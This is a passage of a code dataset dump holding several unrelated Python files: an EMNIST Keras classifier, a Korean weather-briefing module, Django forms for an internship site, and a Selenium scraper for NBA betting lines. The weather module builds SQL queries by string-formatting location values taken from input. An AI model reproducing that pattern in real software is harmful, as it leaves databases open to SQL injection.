255\n# x_test /= 255\n# print(x_train.shape[0], 'train samples')\n# print(x_test.shape[0], 'test samples')\n\n# # convert class vectors to binary class matrices\n# y_train = tf.keras.utils.to_categorical(y_train, num_classes)\n# y_test = tf.keras.utils.to_categorical(y_test, num_classes)\n\n\n# # https://stackoverflow.com/questions/51125969/loading-emnist-letters-dataset/53547262#53547262\nmat = sio.loadmat('emnist-letters.mat')\ndata = mat['dataset']\n\nx_train = data['train'][0,0]['images'][0,0]\ny_train = data['train'][0,0]['labels'][0,0]\nx_test = data['test'][0,0]['images'][0,0]\ny_test = data['test'][0,0]['labels'][0,0]\n\nval_start = x_train.shape[0] - x_test.shape[0]\nx_val = x_train[val_start:x_train.shape[0],:]\ny_val = y_train[val_start:x_train.shape[0]]\nx_train = x_train[0:val_start,:]\ny_train = 
y_train[0:val_start]\n\n\n# convert class vectors to binary class matrices\ny_train = tf.keras.utils.to_categorical(y_train - 1, num_classes, dtype='float32')\ny_test = tf.keras.utils.to_categorical(y_test - 1, num_classes, dtype='float32')\n\ny_val = tf.keras.utils.to_categorical(y_val - 1, num_classes, dtype='float32')\n\nmodel = Sequential()\nmodel.add(Dense(512, activation='relu', input_shape=(784,)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.summary()\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=RMSprop(),\n metrics=['accuracy'])\n\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])", "sub_path": "Baseline(Example).py", "file_name": "Baseline(Example).py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "scipy.io.loadmat", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 40, "usage_type": "name"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.utils.to_categorical", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "549676220", "text": "from datetime import *\nfrom util import db\nfrom . 
import location\nimport random\nfrom weather.corona import Corona\n\n\ncorona = Corona()\n\n\ndef get_json(input_json):\n if 'customerCode' in input_json:\n input_json['CUSTOMER_CODE'] = input_json['customerCode']\n\n _db = db.get_db('weather', 'inbi', 'weather')\n\n city, district = location.get_location(input_json)\n\n cr = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_present WHERE (city='{0}' and district='{1}');\".format(city, district)\n )\n\n td = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_forecast WHERE (city='{0}' and district='{1}' and date='{2}');\".format(\n city, district, date.today().isoformat()\n )\n )\n\n yt = _db.select_one(\n sql_text=\"SELECT * FROM weather.weather_forecast WHERE (city='{0}' and district='{1}' and date='{2}');\".format(\n city, district, (date.today() - timedelta(days=1)).isoformat()\n )\n )\n\n degree = int((td['low_temp'] + td['high_temp'] - yt['low_temp'] - yt['high_temp']) / 2)\n if degree < 0:\n differ = '낮'\n degree *= -1\n else:\n differ = '높'\n\n sentence = '{} 오늘은 {}월 {}일 {}요일이에요. ' \\\n '{}현재 {} {}의 날씨는 {}, 기온은 {}도이며, 미세먼지 지수는 {}이에요. ' \\\n '오늘 최저기온은 {}도, 최고기온은 {}도로 {} 것 같아요. '\\\n .format(\n random.choice([\"안녕히 주무셨어요?\", \"좋은 아침이에요.\"]),\n datetime.today().month, datetime.today().day, \"월화수목금토일\"[datetime.today().weekday()],\n city_is(city, district), city, district, get_status(cr['weather_status']), ondo(cr['temp']),\n cr['dust'], ondo(td['low_temp']), ondo(td['high_temp']), get_reason(degree, differ),\n )\n\n if input_json['CUSTOMER_CODE'] == 'isolation':\n sentence += '오늘 0시 기준 코로나19 확진자는 {}명, 완치자는 {}명이에요.'.format(\n corona.ill, corona.cured\n )\n\n # 안녕히 주무셨어요? / 날짜 알려주고 / 날씨 알려주고\n return {\n 'sentence': sentence,\n 'year': datetime.today().year,\n 'month': datetime.today().month,\n 'day': datetime.today().day,\n 'city': city,\n 'district': district,\n 'temp': cr['temp'],\n 'status': cr['weather_status'],\n 'dust': cr['dust'],\n 'low_temp': td['low_temp'],\n 'high_temp': td['high_temp'],\n 'am_rain': td['am_rain'],\n 'pm_rain': td['pm_rain'],\n 'differ': differ,\n 'degree': degree\n }\n\n\ndef ondo(temp):\n if temp >= 0:\n return str(temp)\n else:\n return \"영하 %d\" % (temp * -1)\n\n\ndef city_is(city, district):\n if city == '서울' and district == '종로구':\n return '지역 설정이 제대로 되어있지 않아 서울 날씨로 알려 드릴게요. 
'\n else:\n return ''\n\n\ndef get_status(s):\n if '맑음' in s:\n return '맑고'\n elif '흐림' in s:\n return '흐리고'\n elif '구름많음' in s:\n return '구름이 많고'\n elif '비' in s:\n return '비가 오고'\n elif '눈' in s:\n return '눈이 오고'\n else:\n return s\n\n\ndef get_reason(deg, dif):\n if deg > 0:\n return '어제보다 %d도 가량 %s을' % (deg, dif)\n elif deg == 0:\n return '어제와 비슷할'\n\n\nif __name__ == '__main__':\n print(get_json({'location': '서울 송파구'})['sentence'])\n", "sub_path": "weather/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3548, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "weather.corona.Corona", "line_number": 8, "usage_type": "call"}, {"api_name": "util.db.get_db", "line_number": 15, "usage_type": "call"}, {"api_name": "util.db", "line_number": 15, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.today", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "84847099", "text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom django.db import transaction\nfrom .models import *\nfrom django.core.exceptions import NON_FIELD_ERRORS\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, ButtonHolder, Submit, Field\n\nclass UserForm(forms.ModelForm):\n\t\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('username','email','password') \n\n# class InternProfileForm(forms.ModelForm):\n# \tclass Meta:\n# \t\tmodel = InternProfile\n# \t\tfields = ['bio','location']\n\nclass PersonalDetailsForm(forms.ModelForm):\n\temail = forms.CharField(label=\"Email ID\")\n\tcontact_number = forms.RegexField(label=\"Mobile Number\",regex=r'^\\+?1?\\d{9,15}$',error_messages = {'invalid':\"Phone number must be entered in the format: '9999999999'. 
Up to 10 digits allowed.\"})\n\tsecond_city = forms.CharField(label=\"Second City\")\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(PersonalDetailsForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper()\n\t\tself.helper.form_method = 'POST'\n\t\tself.helper.form_class = 'form-horizontal'\n\t\tself.helper.label_class = 'col-md-2'\n\t\tself.helper.field_class = 'col-md-8'\n\t\tself.helper.layout = Layout(\n\t\t\tField('name'),\n\t\t\tField('email'),\n\t\t\tField('contact_number'),\n\t\t\tField('current_city'),\n\t\t\tField('second_city'),\n\t\t)\n\n\tclass Meta:\n\t\tmodel = PersonalDetails\n\t\tfields = ['name','email','contact_number','current_city','second_city']\n\n\nclass AcademicDetailsForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = AcademicDetails\n\t\tfields = ['schoolname_10','percentage_10','marksheet_10','schoolname_12','percentage_12','marksheet_12', 'college_name','current_year','cpi','marksheet_clg']\n\n\t# __init__ used to sit inside Meta and call super() on the wrong class;\n\t# it belongs on the form itself and must build its own FormHelper\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(AcademicDetailsForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper()\n\t\tself.helper.form_method = 'POST'\n\t\tself.helper.form_class = 'form-horizontal'\n\t\tself.helper.label_class = 'control-label col-sm-5'\n\t\tself.helper.field_class = 'form-control'\n\t\tself.helper.layout = Layout(\n\t\t\tField('schoolname_10'),\n\t\t\tField('percentage_10'),\n\t\t\tField('marksheet_10'),\n\t\t\tField('schoolname_12'),\n\t\t\tField('percentage_12'),\n\t\t\tField('marksheet_12'),\n\t\t\tField('college_name'),\n\t\t\tField('current_year'),\n\t\t\tField('cpi'),\n\t\t\tField('marksheet_clg'),\n\t\t)\n\nclass ProjectDetailsForm(forms.ModelForm):\n\tproject_link = forms.URLField(required = False)\n\tclass Meta:\n\t\tmodel = ProjectDetails\n\t\tfields = ['title','typeof_project','description','project_link']\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ProjectDetailsForm, self).__init__(*args, **kwargs)\n\t\tself.helper = FormHelper()\n\t\tself.helper.form_method = 'POST'\n\t\tself.helper.form_class = 'form-horizontal'\n\t\tself.helper.label_class = 'control-label col-sm-5'\n\t\tself.helper.field_class = 'form-control'\n\t\tself.helper.layout = Layout(\n\t\t\tField('title', css_class='input-sm'),\n\t\t\tField('typeof_project', css_class='input-sm'),\n\t\t\tField('description', css_class='input-sm'),\n\t\t\tField('project_link', css_class='input-sm'),\n\t\t)\n\nclass InternSignUpForm(UserCreationForm):\n\tclass Meta(UserCreationForm.Meta):\n\t\tmodel = User\n\n\tdef save(self):\n\t\tuser = super().save()\n\t\tuser.is_company = True\n\t\tuser.save()\n\t\tinternprofile = InternProfile.objects.create(user=user)\n\t\t#internprofile.interests.add(*self.cleaned_data.get('interests'))\n\t\treturn user\n\nclass FilterForm(forms.Form):\n\tlocation = forms.CharField(label=\"Choose City\")\n\ttechnology = forms.CharField(label=\"Choose technology\")\n\tstipend = forms.BooleanField(label=\"Stipend\")", "sub_path": "intern/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 3815, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", 
"line_number": 11, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.RegexField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 24, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 28, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 33, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 34, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 35, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 36, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 38, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 48, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 58, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 59, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 60, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 61, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 62, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 63, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 64, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 65, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 66, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 67, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 68, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 74, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 74, "usage_type": "name"}, {"api_name": "django.forms.URLField", "line_number": 75, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 75, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Layout", "line_number": 85, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 86, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 87, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 88, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 89, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Field", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 95, "usage_type": "name"}, {"api_name": "django.contrib.auth.forms.UserCreationForm.Meta", "line_number": 96, "usage_type": "attribute"}, {"api_name": 
"django.contrib.auth.forms.UserCreationForm", "line_number": 96, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 97, "usage_type": "name"}, {"api_name": "django.forms.Form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 110, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 111, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 111, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 112, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 112, "usage_type": "name"}, {"api_name": "django.forms.BooleanField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 113, "usage_type": "name"}]} +{"seq_id": "601035288", "text": "import numpy as np\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef days_between(d1, d2):\r\n \"\"\"\r\n a function that calculates the difference between two dates\r\n :param d1: string - string. format: (\"%Y-%m-%d\")\r\n :param d2: string - string. format: (\"%Y-%m-%d\")\r\n :return: int - difference between two dates\r\n \"\"\" \r\n d1 = datetime.datetime.strptime(d1, \"%Y-%m-%d\").date()\r\n d2 = datetime.datetime.strptime(d2, \"%Y-%m-%d\").date()\r\n return abs((d2 - d1).days)\r\n\r\ndef find_divs_display(driver,length,div_num,wait):\r\n \"\"\"\r\n a function that finds the right div number for the games display on the page. also call\r\n to click_games\r\n :param driver: selenium.webdriver.chrome.webdriver.WebDriver - the driver object\r\n :param length: int - the number of a div nubmer we are checking \r\n :param wait: selenium.webdriver.support.wait.WebDriverWait - the wait driver object\r\n :return: int - the right div number \r\n \"\"\"\r\n if(div_num == -1):\r\n for num in range(length):\r\n xpath = \"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div[\" + str(num)+\"]/div/div/div\"\r\n # just for find exluded time.sleep()\r\n games = wait.until(EC.invisibility_of_element_located((By.XPATH,\"xpath\")))\r\n games = driver.find_elements_by_xpath(xpath)\r\n x = click_games(driver,games)\r\n if(x == True):\r\n div_num = num\r\n break\r\n else:\r\n xpath = \"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div[\" + str(div_num)+\"]/div/div/div\"\r\n # just for find exluded time.sleep()\r\n games = wait.until(EC.invisibility_of_element_located((By.XPATH,\"xpath\")))\r\n games = driver.find_elements_by_xpath(xpath)\r\n click_games(driver,games)\r\n return div_num\r\n \r\ndef click_games(driver,games):\r\n \"\"\"\r\n a function that chcek which game display on the page and click on it\r\n :param driver: selenium.webdriver.chrome.webdriver.WebDriver - the driver object\r\n :param games: list - the list of games we check \r\n :return: bool - if find at least one game that displays on the page \r\n \"\"\"\r\n boolean = False\r\n for game in games:\r\n if(game.is_displayed()):\r\n boolean = True\r\n time.sleep(1)\r\n game.click()\r\n time.sleep(1)\r\n return boolean\r\n\r\ndef extract_lines_change_table_to_df(game_info):\r\n \"\"\"\r\n a function that extracts the important data from a div of a game \r\n :param game_info: bs4.element.Tag - the div game_info of a game included table of lines 
change \r\n    :return team_name: str - the name of the home team\r\n    :return: data frame - table with the line changes\r\n    \"\"\"\r\n    missing_change_line = False  # this means that no team has a plus and the line in this game didn't change\r\n\r\n    team_name = game_info.find('span', class_ = 'teamText').text\r\n    team_name = team_name.partition(\" לדף\")[0][1:]\r\n\r\n    table = game_info.find('table',{ 'class' : 'kode-table kode-table-v3 smaller','data-has-x' : \"1\"})\r\n\r\n    if(table is None):\r\n        table = game_info.find('table',{ 'class' : 'kode-table kode-table-v3','data-has-x' : \"1\"})\r\n        missing_change_line = True\r\n\r\n    tables_rows = table.find_all('tr')\r\n    lst = []\r\n\r\n    for tr in tables_rows:\r\n        td = tr.find_all('td')\r\n        row = [tr.text for tr in td]\r\n        lst.append(row)\r\n\r\n    if(missing_change_line == True):\r\n        lst.append([np.NaN] * 6)  # pad a NaN row matching the six columns; list.append returns None, so never reassign its result\r\n\r\n    df = pd.DataFrame(lst, columns=[\"date\", \"hour\", '1','X','2','advantage'])\r\n    df = df.iloc[1:]\r\n\r\n    return team_name,df\r\n\r\n\r\ndef extract_game_to_df(div):\r\n    \"\"\"\r\n    a function that extracts the important data from a div of a game\r\n    :param div: bs4.element.Tag - the div of a game\r\n    :return: data frame - the dataframe with the important variables\r\n    \"\"\"\r\n    spans = div.find_all('span')\r\n    df = pd.DataFrame()\r\n\r\n    df['time and date'] = [str(spans[3])[40:56]]\r\n    df['teams'] = [spans[4].text]\r\n    df['bet_home'] = [spans[6].text]\r\n    df['bet_x'] = [spans[9].text]\r\n    df['bet_guest'] = [spans[12].text]\r\n    df['final_score'] = [spans[15].text]\r\n    return df\r\n\r\ndef is_contain_game(df,game_check):\r\n    \"\"\"\r\n    a function that checks if the game is already in the dataframe\r\n    :param df: dataframe - the dataframe with all the games\r\n    :param game_check: str - the teams that play the game\r\n    :return: boolean - if the data frame contains the game\r\n    \"\"\"\r\n    is_contain = False\r\n    games = df['teams'].tolist()\r\n    for game in games:\r\n        if(type(game) is str):\r\n            if(game_check in game):\r\n                is_contain = True\r\n    return is_contain\r\n\r\ndef fill_NaN_cells(df):\r\n    \"\"\"\r\n    a function that fills in the NaN values\r\n    :param df: dataframe - the dataframe with all records of a game\r\n    :return: dataframe - dataframe without NaN values\r\n    \"\"\"\r\n    for index in range(6):\r\n        df.iloc[1:,index] = df.iloc[0,index]\r\n    df = df.iloc[1:]\r\n    return df\r\n\r\ndef extract_df_for_day(page_source):\r\n    \"\"\"\r\n    a function that gets a page source HTML code and returns a data frame of all the games and\r\n    the useful details on the games\r\n    :param page_source: str - string of the HTML code\r\n    :return: data frame - the dataframe with all the games\r\n    \"\"\"\r\n\r\n    # parse the HTML code using the lxml parser\r\n    soup = BeautifulSoup(page_source,'lxml')\r\n\r\n    df = pd.DataFrame()\r\n    df['time and date'] = np.NaN\r\n    df['teams'] = np.NaN\r\n    df['bet_home'] = np.NaN\r\n    df['bet_x'] = np.NaN\r\n    df['bet_guest'] = np.NaN\r\n    df['final_score'] = np.NaN\r\n    df['date'] = np.NaN\r\n    df['hour'] = np.NaN\r\n    df['1'] = np.NaN\r\n    df['X'] = np.NaN\r\n    df['2'] = np.NaN\r\n    df['advantage'] = np.NaN\r\n\r\n    games_info = soup.find_all('div',class_ = 'game-info')\r\n    dic = {}\r\n    for game_info in games_info:\r\n        teams_names_and_lines = extract_lines_change_table_to_df(game_info)\r\n        dic[teams_names_and_lines[0]] = teams_names_and_lines[1]\r\n\r\n    # find all games from the soup object\r\n    game_a_filtered = soup.find_all('div',class_ = 'game is-father colorA disableBtns 
closedEvent hasExtraData open filtered-round')\r\n game_b_filtered = soup.find_all('div', class_ = 'game is-father colorB disableBtns closedEvent hasExtraData open filtered-round')\r\n game_a_open = soup.find_all('div',class_ = 'game is-father colorA disableBtns closedEvent hasExtraData open')\r\n game_b_open = soup.find_all('div', class_ = 'game is-father colorB disableBtns closedEvent hasExtraData open')\r\n \r\n # add games to the data frame\r\n for game in (game_a_filtered):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_b_filtered):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_a_open):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n for game in (game_b_open):\r\n df1 = extract_game_to_df(game)\r\n home_team = df1.iloc[0,1]\r\n if(is_contain_game(df,home_team)):\r\n continue\r\n home_team = min(home_team.partition(\"(\")[0][:-1],home_team.partition(\"-\")[0][:-2])\r\n df1 = df1.append(dic[home_team])\r\n df1 = fill_NaN_cells(df1)\r\n df = df.append(df1)\r\n \r\n return df \r\n\r\ndef full_data_frame_extract(webdriver_path,base_url,start_date,end_date,folder_path):\r\n \"\"\"\r\n a function that returns the full data frame with all NBA games between two dates. 
it also saves a CSV file for each date\r\n :param webdriver_path: str - the path of the webdriver location\r\n :param base_url: str - the URL address\r\n :param start_date: str - start date, format: (\"%Y-%m-%d\")\r\n :param end_date: str - end date, format: (\"%Y-%m-%d\")\r\n :param folder_path: str - folder path where the CSV for each day will be saved\r\n :return: data frame - a data frame with all the games and the important variables \r\n \"\"\"\r\n\r\n driver = webdriver.Chrome(webdriver_path)\r\n wait = WebDriverWait(driver,15)\r\n \r\n # define full dataframe\r\n full_df = pd.DataFrame()\r\n full_df['time and date'] = np.NaN\r\n full_df['teams'] = np.NaN\r\n full_df['bet_home'] = np.NaN\r\n full_df['bet_x'] = np.NaN\r\n full_df['bet_guest'] = np.NaN\r\n full_df['final_score'] = np.NaN\r\n full_df['date'] = np.NaN\r\n full_df['hour'] = np.NaN\r\n full_df['1'] = np.NaN\r\n full_df['X'] = np.NaN\r\n full_df['2'] = np.NaN\r\n full_df['advantage'] = np.NaN\r\n \r\n days_num = days_between(start_date,end_date) + 1\r\n\r\n for days in range(days_num):\r\n print(\"\")\r\n print(\"Date: \",start_date)\r\n \r\n url = base_url + start_date\r\n driver.get(url)\r\n \r\n time.sleep(2)\r\n \r\n is_nba = False\r\n # explicit wait instead of a bare time.sleep()\r\n tochnia_element = wait.until(EC.invisibility_of_element_located((By.XPATH,\"//select[@class='leagueFilter selectpicker']\"))) \r\n tochnia_element = driver.find_element_by_xpath(\"//select[@class='leagueFilter selectpicker']\")\r\n time.sleep(0.5)\r\n # explicit wait instead of a bare time.sleep()\r\n tochnia_all_options = wait.until(EC.visibility_of_element_located((By.TAG_NAME,\"option\")))\r\n tochnia_all_options = tochnia_element.find_elements_by_tag_name(\"option\")\r\n\r\n for option in tochnia_all_options:\r\n if(option.get_attribute(\"value\") == 'NBA'):\r\n option.click()\r\n is_nba = True\r\n print(\"There are NBA games on this day!!\") \r\n break\r\n if(is_nba == False):\r\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\").date()\r\n start_date = str(start_date + datetime.timedelta(days=1))\r\n time.sleep(5)\r\n print(\"There aren't NBA games on this day :(\")\r\n continue\r\n \r\n tochnia_element = wait.until(EC.invisibility_of_element_located((By.XPATH,\"//select[@class='roundFilter selectpicker']\")))\r\n\r\n # explicit wait instead of a bare time.sleep()\r\n tochnia_all_options = wait.until(EC.visibility_of_element_located((By.TAG_NAME,\"option\"))) \r\n tochnia_all_options = tochnia_element.find_elements_by_tag_name(\"option\")\r\n\r\n div_num = -1\r\n for option in tochnia_all_options:\r\n if(option.get_attribute(\"value\") == \"\"):\r\n continue\r\n option.click()\r\n\r\n # explicit wait instead of a bare time.sleep()\r\n length = wait.until(EC.presence_of_element_located((By.XPATH,\"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div\")))\r\n length = len(driver.find_elements_by_xpath(\"//*[@id='winnerLinePage']/div[1]/div[1]/div[1]/section[2]/div\"))\r\n div_num = find_divs_display(driver,length,div_num,wait)\r\n\r\n time.sleep(2)\r\n\r\n content = driver.page_source\r\n df = extract_df_for_day(content)\r\n path = folder_path + 'NBA games on ' + start_date +'.csv'\r\n df.to_csv(path, index = False)\r\n print(\"NBA games on\", start_date , \"saved\")\r\n full_df = full_df.append(df)\r\n \r\n start_date = datetime.datetime.strptime(start_date, \"%Y-%m-%d\").date()\r\n start_date = str(start_date + datetime.timedelta(days=1))\r\n\r\n driver.quit()\r\n return full_df\r\n", "sub_path": "Data Scraping/Bankerim/web_scarping habankerim.py", 
"file_name": "web_scarping habankerim.py", "file_ext": "py", "file_size_in_byte": 12507, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 36, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.invisibility_of_element_located", "line_number": 45, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 45, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 61, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 162, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 168, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 236, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 236, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 241, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 243, "usage_type": 